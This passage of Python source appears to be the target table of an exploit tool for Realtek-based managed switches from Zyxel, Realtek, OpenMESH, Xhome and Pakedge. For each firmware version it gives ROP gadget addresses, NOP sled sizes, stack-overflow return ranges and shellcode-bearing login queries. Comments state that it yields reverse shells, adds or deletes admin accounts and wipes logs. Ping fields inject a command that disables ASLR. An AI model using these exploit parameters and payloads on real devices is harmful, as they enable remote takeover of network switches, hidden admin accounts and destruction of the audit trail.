log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_clear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x41D934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x416254,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x416254,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_time_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x416254,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Zyxel\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes (adding username to next free index number, may not be #1)\r\n\t\t\t# Del credentials : Yes (index number instead of username, may not be #1)\r\n\t\t\t#\r\n\t\t\t'222-71560': {\r\n\t\t\t\t'template':'Zyxel',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.40_AAHL.1_20180705',\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'GS1900-24',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.zyxel.com/products_services/8-10-16-24-48-port-GbE-Smart-Managed-Switch-GS1900-Series/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40D60C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998520,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484e148,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t\t\t\t# Not vulnerable\r\n\t\t\t\t\t\t'address':0x4341C4,\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_localUser_post()\r\n\t\t\t\t\t\t'address':0x436D9C,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&usrName=USERNAME&usrPrivType=15&usrPriv=15',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_localUserDel_post()\r\n\t\t\t\t\t\t'address':0x437124,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&_del=1',\t\t\t# First additional user in the list\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# user\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x47D760,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_delete_post()\r\n\t\t\t\t\t\t'log_ramClear':0x480804,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_delete_post()\r\n\t\t\t\t\t\t'log_fileClear':0x480804,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x43BA8C,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x43BA8C,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x43AF54,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable':False,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username='+ self.random_string(100) +'_RA_START&password='+ self.random_string(59) +'&STARTUP_BACKUP=1'+ (('&' + struct.pack('>L',0x2404FF3D) + struct.pack('>L',0x2404FFFF)) * 70) + '&' + struct.pack('>L',0x2404FF3D) +'_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x10010104,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP': 0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 25,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 15,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Realtek\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-40570': {\r\n\t\t\t\t'template':'Realtek',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.0.0.43126',\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'RTL8380-24GE-4GEC',\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24841ea8,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/pingtest_tmp',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x422980,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x423168,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/traceroute_tmp',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x481968,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x4847DC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x4847DC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42C8F0,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42C8F0,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42C8F0,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x7fff7004,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# OpenMESH (some identical with enginius egs series)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'13984-12788': {\r\n\t\t\t\t'template':'OpenMESH',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'01.03.24_180823-1626',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'OMS24',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.openmesh.com/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E12C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248405a0,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_acctAdd_set()\r\n\t\t\t\t\t\t'address':0x424890,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x424890,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pw=&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# user\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_ipv4PingSet()\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x42341C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'&ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x424248,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x43EA88,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x440660,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x440660,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x425260,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x425260,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x425260,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'START':0x100181A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Xhome (identical with Realtek)\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : No\r\n\t\t\t# Del /mntlog/flash.log : No\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'222-64895': {\r\n\t\t\t\t'template':'Xhome',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'3.0.0.43126',\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'DownLoop-G24M',\t\t\t# Model\r\n\t\t\t\t'uri':'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E6DC,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24841ea8,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/pingtest_tmp',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x4229A0,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/traceroute_tmp #&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/traceroute_tmp',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x423188,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x481988,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x4847FC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x4847FC,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42C910,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42C910,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42B6F8,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'START':0x7fff7004,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 28,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 20,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Pakedgedevice & Software\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: No (cannot point JMP correct into NOP on heap)\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'225-21785': {\r\n\t\t\t\t'model':'SX-8P',\r\n\t\t\t\t'template':'Pakedge',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.04',\t\t\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40C86C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998538,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248492ec,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': 